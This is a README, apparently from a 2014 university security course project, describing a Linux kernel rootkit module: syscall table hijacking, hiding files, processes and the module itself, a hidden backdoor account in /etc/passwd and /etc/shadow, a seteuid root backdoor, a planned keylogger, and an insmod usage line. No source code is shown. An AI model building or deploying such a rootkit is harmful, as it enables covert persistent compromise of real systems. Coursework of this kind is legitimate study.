/
README
75 lines (61 loc) · 2.23 KB
/
README
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
/**********************************************************
Last Updated: Nov 16, 2014
CSE509 System Security 2014 Fall @CS SBU
Written By:
Hyungjoon Koo (hykoo@cs.stonybrook.edu)
Yaohui Chen (yaohchen@cs.stonybrook.edu)
***********************************************************/
A. The Rootkit Framework
Platform
Tested at ubuntu linux 12.04 LTS kernel 3.2.0-29-generic
Should be working 3.x kernel version with an appropriate syscall table addr
Module name
kcr.ko
Koo-Chen-Rootkit
Kernel Cracking Rootkit
Directory structure
src/kcr.c :
Define main function
Does device registration
Hijack linux system call table
src/dev.c :
Misc device operations
read, write, open, etc
src/helpers.c:
Define helper functions
src/HJ_x.c:
Functions related to hijacking a ¡°x¡± system call
All hijackings follow the same patterns
i.e HJ_ls.c, HJ_ps.c, HJ_read.c, etc.
src/backdoor.c
Allows a backdoor when having a specific seteuid
headers/dev.h
headers/helpers.h
headers/HJ_ls.h
Describe headers to the corresponding source code
headers/all.h:
Describe common <linux/*> or <asm/*> headers
Include all src/*.c files just for convenience :)
headers/config.h:
Include all.h, and global variables and macros
B. Features (http://securitee.org/teaching/cse509/files/projects/project1.html)
Required implementation
Hide specific files and directories from showing up when a user does "ls" and similar commands
Hide defined prefixes (i.e hide_, bad_, )
Support dynamically changed prefixes
Modify the /etc/passwd and /etc/shadow file to add a backdoor account
while returning the original contents of the files (pre-attack)
when a normal user requests to see the file (sys_read)
Hides processes from the process table when a user does a "ps"
Additional implementation
Key logging (Not yet)
Either saving keystrokes to local file or sending it out to remote site
Backdoor
Allowing a normal program to have a root privilege
Hide the connections (Not yet)
Opening/listening ports
i.e netstat
Hide the rootkit module itself
i.e lsmod
C. Usage
$ make && sudo insmod kcr.ko